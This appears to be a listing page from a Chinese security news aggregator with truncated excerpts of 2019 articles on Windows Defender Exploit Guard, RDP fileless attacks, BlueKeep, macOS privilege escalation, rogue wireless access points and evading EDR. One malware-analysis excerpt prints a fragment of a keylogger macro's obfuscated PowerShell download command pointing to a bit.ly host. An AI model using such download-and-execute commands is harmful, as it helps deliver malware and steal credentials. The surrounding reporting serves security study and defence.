记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

评估一个新的安全数据源的有效性: Windows Defender 漏洞利用防护(下)

评估一个新的安全数据源的有效性: Windows Defender 漏洞利用防护(上)预警和检测策略开发随着我们对可用事件日志、它们的上下文和限制的新理解,我们的CIRT工程师现在可以在构建警报和检测策略时使用这些信息。以下是一些假设的样本,这些假设被开发用来作为潜在的警报/威胁搜索查询的基础,这些查询被漏洞利用防御缓解机制分解。非微软官方的二进制加载此 WDEG 缓解记录由微软签名的进程加载非微软签名模块的任何尝试。 这可以作为一个潜在的有价值的数据源,而不是将应用程序作为白名单的审计或实施。范围系统级别。 与某些文档相反,这种缓解措施可以应用于所有进程。 可以在全系统范围内应用的审计日志非常理想,可以用来识别误报,
发布时间:2019-12-26 13:25 | 阅读:8828 | 评论:0 | 标签:恶意软件 系统安全 Windows Defender 漏洞

评估一个新的安全数据源的有效性: Windows Defender 漏洞利用防护(上)

Windows Defender 漏洞利用防护(WDEG)是一套预防和侦查控制,用于识别和减少针对 Windows 主机的主动攻击尝试。 基于先前增强的缓解经验工具包(EMET)的成功经验,WDEG 不仅提供了一系列广泛的攻击缓解方案,而且还通过提供与异常事件相关的丰富的上下文事件日志充当调查资源。Palantir 的计算机应急响应小组(CIRT)在端点遥测和检测能力方面严重依赖于安全供应商产品,而调查和开发新的与安全相关的数据源是我们成功的基础。 这篇博客文章分析了将“漏洞利用防御”作为一个新的数据源,包括警报和检测策略(ADS)。 我们还将详细介绍企业配置和转出策略,并提供检测假设的抽样。我们提供了一个新的 Git
发布时间:2019-12-24 13:25 | 阅读:11985 | 评论:0 | 标签:恶意软件 系统安全 Windows Defender 漏洞

攻击者利用Windows远程桌面服务进行无文件攻击

研究人员发现攻击者开发的恶意软件开始利用远程桌面协议(RDP)协议来窃取企业数据,并且不在目标主机上留下痕迹。加密货币挖矿机、信息窃取器、勒索软件等使用远程连接可以在RAM中运行,也可以从被黑的机器中窃取有用的信息。利用Windows RDS特征攻击者利用了Windows 远程桌面服务(RDS)中的一个特征,允许客户端分享本地驱动给有读写权限的Terminal Server。驱动在服务器上以名为tsclient+驱动盘字母的虚拟网络位置的共享,而且可以本地映射。这些特征已经出现一段时间了,当用户连接到服务器,并以应用的形式运行时的动作就可以解释了。这种通过RDP来访问资源是可行的,而且不会在客户端机器的硬盘上留下痕迹,
发布时间:2019-12-23 18:25 | 阅读:9301 | 评论:0 | 标签:系统安全 windows

回归基本: 写给安全外行人的计算机和智能手机安全加固建议

“加固”一词的定义,来源: Techopedia我经常注意到,信息安全专业人士写的文章都是针对那些已经对网络安全原则有高度理解的同行。 如果你正在写一份技术白皮书或者其他一些东西的话,这些都是没有问题的,但是我不认为我们已经做了足够多的工作来教育日常的普通用户关于任何人都可以采取的基本步骤来增强计算机和智能手机的安全性。 在这篇文章中,我将与你们分享一些网络安全最佳实践,这些安全措施可以帮助保护你们的个人信息和计算机设备。 这是一个简短的”回归基本”的指南,将侧重于为任何技能和知识水平的互联网用户提供相关的基本网络安全最佳做法,但对普通用户尤其有用。作为一名前海军陆战队队员,我一直致力于让事情简单化
发布时间:2019-12-13 13:25 | 阅读:29855 | 评论:0 | 标签:安全工具 移动安全 系统安全 安全加固

预警!Windows BlueKeep RDP来了!

一、漏洞预警2019年10月,深信服安全团队监测到RDP远程代码执行(CVE-2019-0708、BlueKeep)漏洞利用活跃度骤增。该漏洞会让被攻击的机器失陷或蓝屏,导致业务中断造成巨大损失。近日,海外网络罪犯正在使用该漏洞来查找暴露在网络上的易受攻击的系统,并在其上释放挖矿程序,影响正常业务。二、漏洞概要三、漏洞分析3.1 Remote Desktop Protocol组件介绍Remote Desktop Protocol(远程桌面协议,RDP)是微软公司创建的专有协议。它允许系统用户通过图形用户界面连接到远程系统。通常情况下,在企业中,RDP或者终端服务会话被配置在需要分布式客户端机器来连接的服务器上。它可以用
发布时间:2019-12-13 13:25 | 阅读:11736 | 评论:0 | 标签:系统安全

404 Keylogger最新木马,盗取受害者浏览器网站帐号和密码

近日深信服安全团队捕获到一个最新的404 Keylogger木马变种,通过OFFICE文档嵌入恶意宏代码进行传播,盗取受害者浏览器的网站帐号和密码,深信服安全团队对此样本进行了详细分析,并获取到了黑客FTP服务器的帐号和密码,请大家提高安全意识,不要轻易打开未知的邮件附件及文档等。样本是一个RTF文档,里面嵌套了OLE对象,包含恶意宏代码,如下所示:恶意宏代码,会启动PowerShell进程,从远程服务器上下载恶意程序,然后执行,相关参数,如下:powershell (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly
发布时间:2019-12-13 13:25 | 阅读:9316 | 评论:0 | 标签:系统安全

macOS红蓝对抗:如何欺骗具有特权的帮助工具以获取root权限

概述我们在此前的文章曾经提到过,macOS权限提升通常是通过诱导用户,而不是利用0-day或未修复的漏洞来实现的。从红队的角度来看,有一个可能提供帮助的本地工具——AppleScript。AppleScript可以轻松、快速地产生虚假的授权请求,这些请求在用户看起来可能很有说服力。尽管这并非一项新的技术,但在本文中,我们将探索一些新颖的方式,可以滥用AppleScript的功能来欺骗用户已经在本地系统上信任的特权进程。什么是具有特权的帮助工具?Mac上的大多数应用程序都不需要权限提升就可以执行工作。如果是从Apple的App Store购买的应用程序,从技术上来看,它们是不允许提升权限的。尽管如此,有时应用程序确实有充
发布时间:2019-12-12 13:25 | 阅读:9757 | 评论:0 | 标签:系统安全 macOS红蓝对抗

卡巴斯基:生物特征数据处理和存储系统的威胁调查报告

生物特征数据处理系统最初主要用于警察、海关之类的政府机构,但随着信息技术的快速发展,生物识别技术也开始走入我们的日常生活,除了政府机构和工业自动化系统外,商业办公、笔记本电脑和智能手机也开始将生物识别纳入发展。这类技术逐渐扩大并取代了传统的如基于账号密码的身份验证方法。的确,利用每个人独特的指纹、声音、面部形状或眼睛结构来识别人,似乎是一种显著且方便的办法。但是,与许多迅速发展的其他技术一样,生物特征认证系统也被证明有明显的缺陷,主要与信息安全问题有关。在这份报告中,我们将以卡巴斯基收集的2019年第三季度数据为基准,讨论影响生物认证系统的信息安全问题,并评估现有生物认证系统的相关风险。生物特征数据处理和存储系统所面临
发布时间:2019-12-05 13:25 | 阅读:11243 | 评论:0 | 标签:系统安全 观察 卡巴斯基 生物识别数据安全

移动设备数字取证过程概述(上)

 使用 WinHex 分析黑莓手机现在是二十一世纪,手机已经无处不在。 居住在第一世界发达国家的大多数公民都可以相对便宜地获得手机技术和价格计划。 像苹果、微软、谷歌和三星这样的科技公司统治着蓬勃发展的手机市场,并且几乎每年都在开发新的产品。 这种做法使得普通的美国中产阶级几乎不可能赶上众所周知的“邻居” ,比如,拥有最新的 iPhone 或三星 Galaxy 手机。 开发人员对纳米技术和纳米存储器进行了改进,现代智能手机功能强大得令人难以置信,几乎可以做到台式机或笔记本电脑所能做到的一切。 大型计算机占用整个仓库执行复杂计算任务的日子早已一去不复返了。 一些技术专家甚至预测,在不远的将来,人们甚至不需要台式
发布时间:2019-12-02 13:26 | 阅读:19198 | 评论:0 | 标签:二进制安全 系统安全 移动设备取证 移动

“Adobe Flash Player”木马惊现新变种

最近暗影安全实验室在日常监测中发现了一款新的木马病毒Ginp,虽然他和前两周发布的反间谍之旅004报告中描述的“Flash Player”木马病毒名称很相似都带有“Flash Player”,但是他们却属于不同病毒家族。该恶意软件的最初版本可以追溯到2019年6月初,它伪装成“Google Play Verificator”应用程序。当时,Ginp是一个简单的短信窃取器,其目的只是将用户手机接收和发出的短信副本发送到C2服务器。在2019年8月,一个新版本发布了,增加了银行木马特有的功能。这个恶意软件被伪装成假冒的“Adobe Flash Player”应用程序,恶意软件代码增强了反混淆能力。Ginp较前两周发布的“F
发布时间:2019-12-02 13:26 | 阅读:12860 | 评论:0 | 标签:系统安全 Adobe Flash Player

无 PowerShell.exe 运行 PowerShell 脚本的几种方法

本文将概述在不使用 powershell.exe 的情况下运行 powershell 脚本和命令的最佳工具。在过去的几个月里,我通过观察攻击者以及随之而来的杀毒软件的移动情况后,我打算写这篇文章给所有的渗透测试人员和红队成员,他们正在寻找在后漏洞利用阶段使用 PowerShell 脚本或命令行的最佳技术,而不需要运行 PowerShell.exe,从而避免被下一代杀毒软件、 EDR 或蓝队或威胁追踪团队捕获。在网上,我花了一些时间尝试和分析适合这个目的的不同工具。 对于每一个工具,我都给出了我个人的评分。 请让我知道你的想法以及你的经验或其他与文本提到的类似的工具。 下面是本文中测试的工具列表:· Power
发布时间:2019-11-28 13:25 | 阅读:12801 | 评论:0 | 标签:内网渗透 安全工具 系统安全 Powershell

一个奶爸对家庭信息安全的思考

注意: 我在这篇文章中推荐了几种智能家居产品。 这些仅代表了我个人基于尝试、错误和经验的观点,并且绝不代表任何与我有关联的组织或公司的观点(而且这些链接都不是附属链接)。作为三个孩子的父母,我知道在这个日益科技化的世界里,保护你的孩子是很困难的。 作为 Palantir 的一名信息安全工程师,我知道坏人利用安全漏洞的速度有多快。 幸运的是,我在 Palantir 的工作也教会了我如何超越那些坏蛋
发布时间:2019-11-23 13:25 | 阅读:12362 | 评论:0 | 标签:无线安全 系统安全 信息安全

现代无线侦察技术(二):MANA 和已知信标攻击

在本系列文章的第一部分中,我们介绍了802.11的一些基本原理,并描述了如何利用协议的漫游和网络选择特性来执行无线中间人(PITM)攻击。 我们还讨论了如何在 EAPHammer 中执行基本的仿冒接入点攻击(参见: https://github.com/s0lst1c3/eaphammer)。 如果你还没有读过本系列文章的第一部分,你可以在这里找到:· https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee在本系列的下一篇文章中
发布时间:2019-11-22 13:25 | 阅读:15563 | 评论:0 | 标签:内网渗透 无线安全 系统安全

特权提升攻防揭秘:macOS恶意软件如今还需要root提权吗?

一、前言在本篇文章中,我们详细描述关于macOS上的特权提升。首先,我们将介绍安全研究人员在Apple桌面操作系统的最新版本中发现的一些漏洞,其中重点说明已经转化为可靠漏洞利用的一些漏洞。针对这些漏洞,提出面向企业和终端用户的安全建议。随后,我们将视角从研究人员转向攻击者,探讨macOS威胁参与者所使用的的攻击方法,并说明为什么他们采用了与安全研究人员截然不同的方法。二、什么是特权提升?首先,我们先对这个专业名词进行解释。每当要执行一段代码时,操作系统都会在调用代码的用户上下文中执行。从技术上说,这个用户不一定是真实的用户,但为了方便理解,我们在这里仅指用户启动某些应用程序或脚本的场景。在这时,代码可以访问用户拥有的资
发布时间:2019-11-20 13:25 | 阅读:13031 | 评论:0 | 标签:系统安全 MacOS恶意软件 提权

开源情报(OSINT)侦察指北

社交媒体上的对话; 图片由Ethority提供于2014年慢点,牛仔! 在我们开始讨论红队已经为人所知的爆炸式的“性感时刻”(笑话,笑声)黑客冒险之前,我们还有一些功课要做。 一个专业的渗透测试人员从来不会在没有事先学习或者对他们的目标做“功课”的情况下开始一项工作。 关键的第一步是在操作范围内收集特定目标的信息,这使攻击者能够发现组织防御系统中可能被利用的潜在漏洞和弱点,无论是物理的、社会工程的、逻辑的还是三者的结合。 信息是一种新的交换商品,互联网上几乎可以免费获得的关于任何主题的大量信息。 那么 OSINT 到底是什么意思呢?开源情报(OSINT)是利用公开的资源来收集信息。从包括互联网在内的各种来源收集有关个人
发布时间:2019-11-19 13:25 | 阅读:20705 | 评论:0 | 标签:内网渗透 安全工具 系统安全

现代无线侦察技术(一):伪基站攻击基本理论篇

引言在过去的几年里,强制无线设备连接到恶意接入点的“微妙艺术”已经有了一些令人兴奋的发展。 在 Dominic White 和 Ian de Villiers 对 MANA 的研究以及 George Chatzisofroniou 的 Lure10和已知信标攻击中,我们已经看到了 karma 风格的攻击手段的复苏,这些攻击可以用来攻击对 karma 免疫的设备[1][2]。我想更深入地研究这些技术,了解它们在技术层面上是如何工作的,并且尝试试图亲自实现这些技术似乎看起来是一个完美的学习机会。 本文最初的目的是用相对简短的篇幅叙述我如何努力重现这些技术,并将其整合到 EAPHammer(见:https://github.
发布时间:2019-11-19 13:25 | 阅读:15827 | 评论:0 | 标签:内网渗透 无线安全 系统安全

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云